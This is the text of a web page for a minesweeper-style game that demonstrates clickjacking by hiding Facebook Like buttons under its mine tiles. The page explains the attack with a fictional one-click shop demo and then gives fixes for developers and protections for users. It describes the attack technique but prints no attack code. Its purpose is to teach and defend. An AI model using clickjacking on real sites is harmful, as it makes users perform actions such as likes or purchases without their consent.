🚩🚩🚩 Social Minefield 🚩🚩🚩

A high-stakes game of minesweeper.

Rules:

Click a tile to start!

How does it work?

The game works by exploiting a security flaw called Clickjacking, which allows a malicious site to redirect clicks to another website to perform actions on behalf of the user, without their consent.

In this game, in the locations where mines would be, are actually hidden Facebook like buttons embedded in the page. When you click them, it will cause your Facebook account to like the link it is pointed at. For example:

A partially completed game of Social Minefield, but with the Facebook Like buttons visible.

As you can see, the suspiciously shaped tiles of this minesweeper game hide a secret. Let's take a closer look into the world of Clickjacking attacks.

The Clickjacking attack

In the security world, Clickjacking is a forgotten cousin when compared to other high-profile exploits such as SQL Injection or Cross Site Scripting (XSS). However, if a site is vulnerable to it, there still can be bad consequences for users.

Here's a fictional, interactive demonstration of how Clickjacking attacks work:

padlock icon indicating a secure site connection
https://shopfast.com.au/shonky-hammer
Shop Fast Logo

ShopFast

Logged in as Gareth
low quality hammer thumbnail

Shonky Hammer

Shonky Steve PTY LTD

$100.00

Reviews: 100 ★★☆☆☆ 2 stars

It sucks!!!

★☆☆☆☆ 1 star

Barely works!!!

★☆☆☆☆ 1 star

How do I refund??

★★★★★ 5 stars

Item is great but got lost!!!

★★☆☆☆ 2 stars

Delivered quickly

★★★★★ 5 stars

Welcome to ShopFast!

Australia's leading eCommerce website.

This fictional site lets you purchase goods from sellers across the world, with just one click.

Pressing the '1-click buy' button will automatically debit the money from your account, and send the purchased item to your address.

Try clicking it! To make it easier to understand how the demo works, we'll make a pop-up appear when you click it.

How do I know if a site is vulnerable?

I've written a tool to easily check whether a site is vulnerable to Clickjacking. A site is vulnerable when the developer responsible for hosting it has not included a setting on their website that will reject attempts at embedding it on other websites.

Loading...

What these field values specify is whether another website is allowed to embed this website in their site. If it's not allowed, then your web browser (Chrome, Firefox, Safari, etc) will refuse to embed it if it's tried, thus thwarting the attack.

As an example, here's what it looks like when your browser attempts to load a website that isn't allowed to be embedded (in this case, Google).

Some sites may intentionally want to allow being embedded in other sites, such as the Facebook "Like" button. It's used to allow websites (such as news sites) to let users "like" a page, making sure the article gets more attention. Facebook uses the Like button to discreetly track users across the web. They're embedded across 7.5 million websites - that's quite a spy network!

I'm a developer, how do I fix my site?

I've written a guide here.

How to eradicate this vulnerability?

The crux of the problem is that it's allowed by default. If instead it was changed to disallowed by default, and only allow same-origin embeds (i.e. the site can embed itself), this problem wouldn't occur nearly as often.

That's it. Change the default behaviour to instead require opting-in into allowing embeds. Whilst this may break some existing sites, it would one line of configuration change to allow where it's needed.

If the site is unable to be updated (perhaps it's fallen out of maintenance), it's possible to use browser extensions to override the settings, and enable it again.

There are a lot of websites out there that are not created by elite teams of developers, with a security team backing them to detect these problems. Instead, there's many apps out there, made by junior developers, or farmed out to the lowest bidder. It is generally a Good Idea to defend against ignorance.

How do I protect myself?

Unfortunately, it's up to the website creators to fix their website to make their users not vulnerable to Clickjacking attacks for that site.

However, if you wish to fix this specific attack against Facebook likes, you can install some software which has built-in protections against trackers and ads, which thwart this method.

I personally recommend:

  • Firefox or Safari (iOS/Mac) browsers.
    • These both have great built-in protections for both safety and privacy.
    • Unfortunately Google Chrome does not (and probably won't ever) have privacy protections from trackers, as their business is built around tracking user-information and selling ads.
  • Privacy Badger - A browser extension that intelligently blocks trackers.
    • For Google Chrome: here
    • For Firefox: here
    • For Edge: here
    • Safari is not supported. 😞
  • uBlock Origin - The best ad blocker in existence.
    • For Google Chrome: here
    • For Firefox: here
    • For Edge: here
    • Safari is not supported. 😞 However, I've heard good things about 1Blocker.

Acknowledgements

Some resources were used in the supporting material.
  • Squiggly arrow from Wannapik
  • Shopfast logo, broken hammer, cool car images by Dall-E 3.
  • Under construction logo from textfiles.
  • Cool text generator from cooltext.com.
  • Favicon generated from Twemoji.

If you're curious, the code for all this is free and open-source on GitHub, here. Or, just view source on this page. 🙃